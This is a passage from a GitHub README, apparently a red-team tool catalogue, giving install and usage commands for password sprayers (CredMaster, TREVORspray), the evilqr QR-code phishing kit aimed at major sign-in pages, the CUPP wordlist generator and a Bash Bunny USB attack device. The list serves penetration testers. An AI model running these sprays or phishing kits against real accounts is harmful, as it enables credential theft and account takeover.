config.json\"\u003e\u003cpre\u003epython3 credmaster.py --plugin {pluginname} --access_key {key} --secret_access_key {key} -u userfile -p passwordfile -a useragentfile {otherargs}\npython3 credmaster.py --config config.json\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThis tool requires AWS API access keys, a walkthrough on how to acquire these keys can be found here: \u003ca href=\"https://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b\" rel=\"nofollow\"\u003ehttps://bond-o.medium.com/aws-pass-through-proxy-84f1f7fa4b4b\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://private-user-images.githubusercontent.com/100603074/423172634-f678cca4-7a53-41e7-9323-51e8efd0e6ba.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjM0LWY2NzhjY2E0LTdhNTMtNDFlNy05MzIzLTUxZThlZmQwZTZiYS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xZmUwZWIzMWJjYmM3NWE2NzZlZWM3MGJkZTc1M2QxNjQ3YWY3MmViY2Y3OTU5YTQxOTg3MWExOTM3MWU1MjQ1JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.uPN-W0Xd_kFXzNWGPPhSlLOYeX5V_J_bBQJlnIiiCT0\"\u003e\u003cimg 
src=\"https://private-user-images.githubusercontent.com/100603074/423172634-f678cca4-7a53-41e7-9323-51e8efd0e6ba.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjM0LWY2NzhjY2E0LTdhNTMtNDFlNy05MzIzLTUxZThlZmQwZTZiYS5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT0xZmUwZWIzMWJjYmM3NWE2NzZlZWM3MGJkZTc1M2QxNjQ3YWY3MmViY2Y3OTU5YTQxOTg3MWExOTM3MWU1MjQ1JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.uPN-W0Xd_kFXzNWGPPhSlLOYeX5V_J_bBQJlnIiiCT0\" alt=\"credmaster\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/knavesec/CredMaster/wiki\"\u003ehttps://github.com/knavesec/CredMaster/wiki\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/blacklanternsecurity/TREVORspray\"\u003eTREVORspray\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-trevorspray\" class=\"anchor\" aria-label=\"Permalink: 🔙TREVORspray\" href=\"#trevorspray\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 
3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eTREVORspray is a modular password sprayer with threading, SSH proxying, loot modules, and more!\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"pip install https://github.com/blacklanternsecurity/TREVORspray\"\u003e\u003cpre\u003epip install https://github.com/blacklanternsecurity/TREVORspray\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Recon\npython3 ./trevorspray --recon evilcorp.com\n\n# Enumerate users via OneDrive\npython3 ./trevorspray --recon evilcorp.com -u emails.txt --threads 10\n\n# Spray against discovered\npython3 ./trevorspray -u emails.txt -p 'Welcome123' --url https://login.windows.net/b43asdas-cdde-bse-ac05-2e37deadbeef/oauth2/token\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Recon\u003c/span\u003e\npython3 ./trevorspray --recon evilcorp.com\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Enumerate users via OneDrive\u003c/span\u003e\npython3 ./trevorspray --recon evilcorp.com -u emails.txt --threads 10\n\n\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Spray against discovered\u003c/span\u003e\npython3 ./trevorspray -u emails.txt -p \u003cspan class=\"pl-s\"\u003e\u003cspan class=\"pl-pds\"\u003e'\u003c/span\u003eWelcome123\u003cspan 
class=\"pl-pds\"\u003e'\u003c/span\u003e\u003c/span\u003e --url https://login.windows.net/b43asdas-cdde-bse-ac05-2e37deadbeef/oauth2/token\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eFor full usage instructions see \u003ca href=\"https://github.com/blacklanternsecurity/TREVORspray?tab=readme-ov-file#how-to---o365\"\u003ehere\u003c/a\u003e.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://private-user-images.githubusercontent.com/100603074/423172625-67c64f6d-527a-4b59-8dd9-b73bc68274f4.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjI1LTY3YzY0ZjZkLTUyN2EtNGI1OS04ZGQ5LWI3M2JjNjgyNzRmNC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1kM2M5NjA5NTA0MmJjNTQzZjMyYzViOGZjMjE4YzE3MmE2ZmVkOTQ3NjJmYTEzMzZiN2M4NTYwMTc4NGJjZDg4JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.YQZ3I12_jIbHB1aOb1hE1UK4H_P1cNvlR7u0hIhxUY4\"\u003e\u003cimg 
src=\"https://private-user-images.githubusercontent.com/100603074/423172625-67c64f6d-527a-4b59-8dd9-b73bc68274f4.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjI1LTY3YzY0ZjZkLTUyN2EtNGI1OS04ZGQ5LWI3M2JjNjgyNzRmNC5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT1kM2M5NjA5NTA0MmJjNTQzZjMyYzViOGZjMjE4YzE3MmE2ZmVkOTQ3NjJmYTEzMzZiN2M4NTYwMTc4NGJjZDg4JlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.YQZ3I12_jIbHB1aOb1hE1UK4H_P1cNvlR7u0hIhxUY4\" alt=\"TREVORspray\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/blacklanternsecurity/TREVORspray\"\u003ehttps://github.com/blacklanternsecurity/TREVORspray\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/kgretzky/evilqr\"\u003eevilqr\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-evilqr\" class=\"anchor\" aria-label=\"Permalink: 🔙evilqr\" href=\"#evilqr\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 
1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eToolkit demonstrating another approach to a QRLJacking attack, allowing remote account takeover through sign-in QR code phishing.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eIt consists of a browser extension used by the attacker to extract the sign-in QR code and a server application, which retrieves the sign-in QR codes to display them on the hosted phishing pages.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eDemo \u003ca href=\"https://www.youtube.com/watch?v=8pfodWzqMcU\" rel=\"nofollow\"\u003evideo\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Extension)\u003c/strong\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eYou can load the extension in Chrome through the \u003ccode\u003eLoad unpacked\u003c/code\u003e feature:\n\u003ca href=\"https://developer.chrome.com/docs/extensions/mv3/getstarted/development-basics/#load-unpacked\" rel=\"nofollow\"\u003ehttps://developer.chrome.com/docs/extensions/mv3/getstarted/development-basics/#load-unpacked\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eOnce the extension is installed, make sure to pin its icon in Chrome's extension toolbar, so that the icon is always visible.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall: (Server)\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/kgretzky/evilqr;cd evilqr/server/;build_run.bat\"\u003e\u003cpre\u003egit clone https://github.com/kgretzky/evilqr\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e evilqr/server/\u003cspan 
class=\"pl-k\"\u003e;\u003c/span\u003ebuild_run.bat\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003col dir=\"auto\"\u003e\n\u003cli\u003eRun the server by running the built server binary: \u003ccode\u003e./server/build/evilqr-server\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003eOpen any of the supported websites in your Chrome browser, with installed \u003cstrong\u003eEvil QR\u003c/strong\u003e extension:\u003c/li\u003e\n\u003c/ol\u003e\n\u003cdiv class=\"snippet-clipboard-content notranslate position-relative overflow-auto\" data-snippet-clipboard-copy-content=\"https://discord.com/login\nhttps://web.telegram.org/k/\nhttps://whatsapp.com\nhttps://store.steampowered.com/login/\nhttps://accounts.binance.com/en/login\nhttps://www.tiktok.com/login\"\u003e\u003cpre class=\"notranslate\"\u003e\u003ccode\u003ehttps://discord.com/login\nhttps://web.telegram.org/k/\nhttps://whatsapp.com\nhttps://store.steampowered.com/login/\nhttps://accounts.binance.com/en/login\nhttps://www.tiktok.com/login\n\u003c/code\u003e\u003c/pre\u003e\u003c/div\u003e\n\u003col start=\"3\" dir=\"auto\"\u003e\n\u003cli\u003eMake sure the sign-in QR code is visible and click the \u003cstrong\u003eEvil QR\u003c/strong\u003e extension icon in the toolbar. 
If the QR code is recognized, the icon should light up with colors.\u003c/li\u003e\n\u003cli\u003eOpen the server's phishing page URL: \u003ccode\u003ehttp://127.0.0.1:35000\u003c/code\u003e (default)\u003c/li\u003e\n\u003c/ol\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" href=\"https://private-user-images.githubusercontent.com/100603074/423172607-00ad78c5-1978-4e59-a522-7e8b9c39b1c3.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjA3LTAwYWQ3OGM1LTE5NzgtNGU1OS1hNTIyLTdlOGI5YzM5YjFjMy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01MjliZTU4NmYzZTZmNmNjZjViMDg4OWVlYTNkZGRhMTYwMDk4ZDEyMTI2MGU0ZDNlOTkxM2YzZDk4NDEzM2VmJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.LavVF9LZlkFYH3JEOSizSu0pgNEGBWcqVtr6p2AdFwA\"\u003e\u003cimg src=\"https://private-user-images.githubusercontent.com/100603074/423172607-00ad78c5-1978-4e59-a522-7e8b9c39b1c3.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjA3LTAwYWQ3OGM1LTE5NzgtNGU1OS1hNTIyLTdlOGI5YzM5YjFjMy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT01MjliZTU4NmYzZTZmNmNjZjViMDg4OWVlYTNkZGRhMTYwMDk4ZDEyMTI2MGU0ZDNlOTkxM2YzZDk4NDEzM2VmJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.LavVF9LZlkFYH3JEOSizSu0pgNEGBWcqVtr6p2AdFwA\" alt=\"evilqr\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp 
dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://breakdev.org/evilqr-phishing/\" rel=\"nofollow\"\u003ehttps://breakdev.org/evilqr-phishing/\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/Mebus/cupp\"\u003eCUPP\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-cupp\" class=\"anchor\" aria-label=\"Permalink: 🔙CUPP\" href=\"#cupp\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThe most common form of authentication is the combination of a username and a password or passphrase. 
Passwords can sometimes be guessed by profiling the user, such as a birthday, nickname, address, name of a pet or relative, or a common word such as God, love, money or password.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003eThat is why CUPP was born.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eInstall:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"git clone https://github.com/Mebus/cupp;cd cupp\"\u003e\u003cpre\u003egit clone https://github.com/Mebus/cupp\u003cspan class=\"pl-k\"\u003e;\u003c/span\u003e\u003cspan class=\"pl-c1\"\u003ecd\u003c/span\u003e cupp\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003cstrong\u003eUsage:\u003c/strong\u003e\u003c/p\u003e\n\u003cdiv class=\"highlight highlight-source-shell notranslate position-relative overflow-auto\" dir=\"auto\" data-snippet-clipboard-copy-content=\"# Run in interactive mode\npython3 ./cupp.py -i\"\u003e\u003cpre\u003e\u003cspan class=\"pl-c\"\u003e\u003cspan class=\"pl-c\"\u003e#\u003c/span\u003e Run in interactive mode\u003c/span\u003e\npython3 ./cupp.py -i\u003c/pre\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer\" 
href=\"https://private-user-images.githubusercontent.com/100603074/423172603-39ad1c58-de4e-449a-b2d4-a9629d5ab82c.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjAzLTM5YWQxYzU4LWRlNGUtNDQ5YS1iMmQ0LWE5NjI5ZDVhYjgyYy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT02NDdlY2VlNGYxZDQwZGY1ZmRhNTEzNTczY2Q2Y2M0YTliMWI0NjliNzc2YWU0YjNhZmY4MWQzNmNiNTc5NTRlJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.ojCDSk4bT3ngU0K4rrZaolNnqXMAbvHzltaFfxSmmuM\"\u003e\u003cimg src=\"https://private-user-images.githubusercontent.com/100603074/423172603-39ad1c58-de4e-449a-b2d4-a9629d5ab82c.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3NDMwMjY0MjIsIm5iZiI6MTc0MzAyNjEyMiwicGF0aCI6Ii8xMDA2MDMwNzQvNDIzMTcyNjAzLTM5YWQxYzU4LWRlNGUtNDQ5YS1iMmQ0LWE5NjI5ZDVhYjgyYy5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjUwMzI2JTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI1MDMyNlQyMTU1MjJaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT02NDdlY2VlNGYxZDQwZGY1ZmRhNTEzNTczY2Q2Y2M0YTliMWI0NjliNzc2YWU0YjNhZmY4MWQzNmNiNTc5NTRlJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCJ9.ojCDSk4bT3ngU0K4rrZaolNnqXMAbvHzltaFfxSmmuM\" alt=\"cupp\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003cem\u003eImage used from \u003ca href=\"https://github.com/Mebus/cupp\"\u003ehttps://github.com/Mebus/cupp\u003c/a\u003e\u003c/em\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca 
href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://shop.hak5.org/products/bash-bunny\" rel=\"nofollow\"\u003eBash Bunny\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-bash-bunny\" class=\"anchor\" aria-label=\"Permalink: 🔙Bash Bunny\" href=\"#bash-bunny\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z\"\u003e\u003c/path\u003e\u003c/svg\u003e\u003c/a\u003e\u003c/div\u003e\n\u003cp dir=\"auto\"\u003eThe Bash Bunny is a physical USB attack tool and multi-function payload delivery system. 
It is designed to be plugged into a computer's USB port and can be programmed to perform a variety of functions, including manipulating and exfiltrating data, installing malware, and bypassing security measures.\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://hackinglab.cz/en/blog/bash-bunny-guide/\" rel=\"nofollow\"\u003ehackinglab: Bash Bunny – Guide\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://docs.hak5.org/bash-bunny/\" rel=\"nofollow\"\u003eHak5 Documentation\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://github.com/hak5/bashbunny-payloads\"\u003eNice Payload Repo\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca href=\"https://hak5.org/products/bash-bunny\" rel=\"nofollow\"\u003eProduct Page\u003c/a\u003e\u003c/p\u003e\n\u003cp dir=\"auto\"\u003e\u003ca target=\"_blank\" rel=\"noopener noreferrer nofollow\" href=\"https://user-images.githubusercontent.com/100603074/209868292-cc02ce20-7d8e-4019-b953-7082fb0eb828.png\"\u003e\u003cimg src=\"https://user-images.githubusercontent.com/100603074/209868292-cc02ce20-7d8e-4019-b953-7082fb0eb828.png\" alt=\"image\" style=\"max-width: 100%;\"\u003e\u003c/a\u003e\u003c/p\u003e\n\u003cdiv class=\"markdown-heading\" dir=\"auto\"\u003e\u003ch3 tabindex=\"-1\" class=\"heading-element\" dir=\"auto\"\u003e\u003ca href=\"#tool-list\"\u003e🔙\u003c/a\u003e\u003ca href=\"https://github.com/fin3ss3g0d/evilgophish\"\u003eEvilGoPhish\u003c/a\u003e\u003c/h3\u003e\u003ca id=\"user-content-evilgophish\" class=\"anchor\" aria-label=\"Permalink: 🔙EvilGoPhish\" href=\"#evilgophish\"\u003e\u003csvg class=\"octicon octicon-link\" viewBox=\"0 0 16 16\" version=\"1.1\" width=\"16\" height=\"16\" aria-hidden=\"true\"\u003e\u003cpath d=\"m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 
